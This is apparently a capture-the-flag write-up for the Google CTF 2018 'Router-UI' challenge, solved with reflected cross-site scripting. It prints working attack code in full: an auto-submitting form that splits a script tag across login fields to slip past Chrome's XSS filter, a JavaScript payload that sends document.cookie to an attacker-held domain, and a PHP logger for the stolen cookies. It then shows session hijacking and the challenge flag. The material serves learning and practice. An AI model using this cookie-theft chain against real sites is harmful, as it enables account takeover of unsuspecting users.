Google CTF 2018
Router-UI
Using the domain found on the hardened aluminum key, you make your way on to the OffHub router. A revolutionary device that simplifies your life. You’re at the UI page, but attempting to brute force the password failed miserably. If we could find an XSS on the page then we could use it to steal the root user session token. In case you find something, try to send an email to wintermuted@googlegroups.com. If you claim your link includes cat pictures, I’m sure Wintermuted will click it. I hope Chrome’s XSS filter will not block the exploit though.
https://router-ui.web.ctfcompetition.com/
You can find all my CTF solutions here.
XSS stands for cross-site scripting, so the challenge text already tells us what kind of weakness to look for: somewhere the page reflects our input back unescaped.
When we open the site we get the login window shown below.
Try logging in with:
username: test
password: testpassword
The output is:
The response echoes the credentials we submitted, so this POST request is our injection point.
I wrote three small files for the XSS. Two things to keep in mind. First, the router UI is served over HTTPS and Chrome blocks active mixed content, so a script loaded from a plain http:// host would never run: the domain hosting the payload needs a valid TLS certificate and must be reached over https://. Second, the <script> tag is split across the username and password fields so that no single POST parameter contains a complete tag; the two halves only rejoin once the login page reflects them next to each other, which is how the payload gets past the Chrome XSS filter the challenge text warns about.
badlogin.html
```html
<!DOCTYPE HTML>
<html lang="en">
<head>
  <meta charset="utf-8" />
  <title>Cats</title>
</head>
<body>
  <!-- Auto-submitting form: the victim only has to open this page. -->
  <form method="POST" action="https://router-ui.web.ctfcompetition.com/login">
    <!-- The script tag is split across the two fields; it rejoins when the login page reflects both values. -->
    <input name="username" value="<script src=https:">
    <input name="password" value="[YOURDOMAIN].com/badjs.js></script>">
  </form>
  <script>
    document.forms[0].submit();
  </script>
</body>
</html>
```
badphp.php
```php
<?php
// Append the full request URI (path plus query string, i.e. the exfiltrated cookies) to a log file.
file_put_contents('logbad.txt', $_SERVER['REQUEST_URI'] . PHP_EOL, FILE_APPEND);
die;
```
badjs.js
```javascript
// Runs in the victim's browser: send every cookie JavaScript can read (i.e. not HttpOnly) to our logger.
window.location.href = 'https://[YOURDOMAIN].com/badphp.php?' + document.cookie;
```
After that I sent an e-mail to wintermuted@googlegroups.com:
“Please visit https://www.[YOURDOMAIN].
After about a minute I checked logbad.txt and found the session cookie:
/badphp.php?flag=Try%20the%20session%20cookie;%20session=Avaev8thDieM6Quauoh2TuDeaez9Weja
The flag cookie is a decoy pointing at the real one. Note that the session cookie showed up in document.cookie at all, which means it was not marked HttpOnly; with that flag set this exfiltration would have come back empty.
I added this cookie in Chrome and reloaded the page; I was now logged in. Inspecting the password field with the element inspector revealed the flag:
<input type="password" value="CTF{Kao4pheitot7Ahmu}">
CTF{Kao4pheitot7Ahmu}